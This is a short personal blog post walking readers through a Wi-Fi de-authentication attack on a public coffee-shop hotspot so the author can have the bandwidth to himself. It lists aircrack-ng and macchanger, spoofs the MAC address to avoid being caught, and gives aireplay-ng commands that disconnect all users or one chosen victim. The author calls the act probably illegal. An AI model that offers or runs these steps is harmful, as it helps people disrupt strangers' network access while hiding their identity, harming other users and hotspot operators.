Friday, July 4, 2014

HACK: Bully everyone from using any wifi hotspot.

With this cold i cannot imagine someone giving me very hot coffee with slow Internet. I bet the consequences are unbearable.

Today in the morning i went to the coffee shop to get one cup before heading to office, there were several shops but the "free wifi" label attracted me. I decided to remove my computer to finish leeching some torrents. But the shock that fell on me was devastating and unberable. You could imagine how a married man who codes and has kids looks like if the kid pours coffee on the keyboard.
That's how i felt.
Anyway i decided to throw everyone else out of the network (its illegal i guess).

I will give you a step by step procedure on how you can do that. Script kiddies you might be very unlucky though.

This attack is referred as De-authentication attack. I am not liable or responsible for anything you may do with this information


Requirements:
1. Brewed coffee that can last the whole day. This is because you will enjoy the speeds when no one else is using the "free wifi".
2. You must be running on Linux platform.
3. Macchanger. ( sudo apt-get install macchanger)
4. Aircrack-ng. ( sudo apt-get install aircrack-ng)

5. Airplay-ng. ( sudo apt-get install aircrack-ng)
6. Wifi card that can be put into monitor mode.
Step X co
first we need to check if you wifi card is communicating properly with your machine.
Open a terminal and pass the following command

sudo airmon-ng
 this is the result

Next we will have to create our monitor interface, then fake our MAC address to avoid being caught.replace interface with the name of your interface, mine is wlan0

airmon-ng stop
ifconfig interface down
macchanger —mac 00:11:22:33:44:55 interface
airmon-ng start interface
Step X do
Now its time for action. using aireplay-ng we are going to pick the mac address of the hotspot we want to attack. Now run this command

aireplay-ng -0 1 -a bssid monitorinterface
To stop the process use ctrl-c, but you do this when you can no longer take more coffee.
Just incase you want to kick an hater out of the network you will use a different command.

aireplay-ng -0 1 -a bssid -c victimmac interface
I think we are done, now you can enjoy fast internet without bothering about others.
Wifi admins am so sorry but their is no other way you can prevent this. Just halla me for help. :-(

No comments:

Post a Comment